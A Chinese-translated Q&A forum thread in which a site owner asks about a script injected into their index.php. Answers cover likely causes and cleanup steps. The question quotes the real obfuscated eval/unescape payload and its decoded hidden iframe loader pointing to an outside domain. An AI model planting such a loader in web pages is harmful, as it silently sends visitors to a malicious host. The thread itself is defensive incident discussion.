我网站的index.php文件受到下面给出的脚本的影响。因此,谷歌被禁止访问。有人请告诉我这种攻击是什么,有没有解决办法。
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6F%64%66%65%72%2E%63%6F%6D%2F%3F%35%30%36%36%37%31%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
FWIW,上面的未编码版本是
eval(document.write('<iframe src="http://podfer.com/?5066718" width=1 height=1></iframe>'));
感谢和问候
tismon
答案 0 :(得分:1)
听起来像这样:link text
根据您发布的有限信息,我几乎可以保证您在该网站上运行某种开源软件 - 可能不是在受影响的确切网站上,但服务器上可能有一些...并且它也不太可能符合现行标准。我已经看到它发生在phpBB,Joomla(特别是Joomla)phpMyAdmin和Wordpress上。这几乎是可怕的共同点,99%的时间远没有人想象的那么复杂。它发生在Mambo的一个非常旧的测试安装上,并且与一个流氓安装的phpBB一起工作,IT人员偷偷在服务器上与他们的幻想足球联盟进行交流。
事实上,黑客是懒惰的。除非你有他们真正想要的东西,否则他们没有理由单独去攻击你......这不值得他们花时间。但是,如果您使用可利用的代码库运行通用代码,他们可以随机扫描站点,当他们找到漏洞时,会自动进行攻击。因此,代码在内容和位置上几乎始终是相同的。停放网站......张贴“正在建设中”页面。无论是手动还是自动,都要将代码拉下并擦洗。现在停止!更新所有开源代码,无论它有多近。现在对权限,SQL查询(尤其是未转义的搜索框)和用户权限系统进行完整性检查。运行脚本注入测试。最后,一旦它完全清除,测试,测试,测试。最后,认为它可能与问题没什么关系,更改密码并使用良好的密码策略来保护它。
祝你好运。小心!答案 1 :(得分:0)
什么bpeterson76说,但也:
如果您没有在系统上运行任何常用软件,我首先会检查您自己的脚本,特别是如果您在任何地方对文件系统进行任何写入操作。但它也可能是过时的服务器软件,如apache或者你有什么暴露出安全漏洞。由于数据已添加到您的文件中,因此不太可能是SQL注入。
根据您的托管,更新所有服务器软件,或询问您的托管服务提供商。
你有任何日志吗?好好看看它们可能会揭示这个洞。如果您使用共享主机,则在某些设置中,如果您的文件权限是允许的,其他客户可以写入您的文件。
答案 2 :(得分:0)
我不久前在我的网站上发生了类似的攻击。首先,检查web根目录下的文件夹,查找以函数命名的php文件。我的是opendir,iswritable等。您应该在这些文件中看到更多base64编码的脚本。如果不这样做,可能是无关的。在任何情况下,podfer.com的who.is记录都有一些信息。联系该网站的托管公司并告诉他们正在发起CSS攻击,他们应该关闭他而不会有太多麻烦。我找到了那个以这种方式对我产生影响的黑客。
此外,如果您使用的是Mosso / rackspace,则应该进入并收紧文件权限。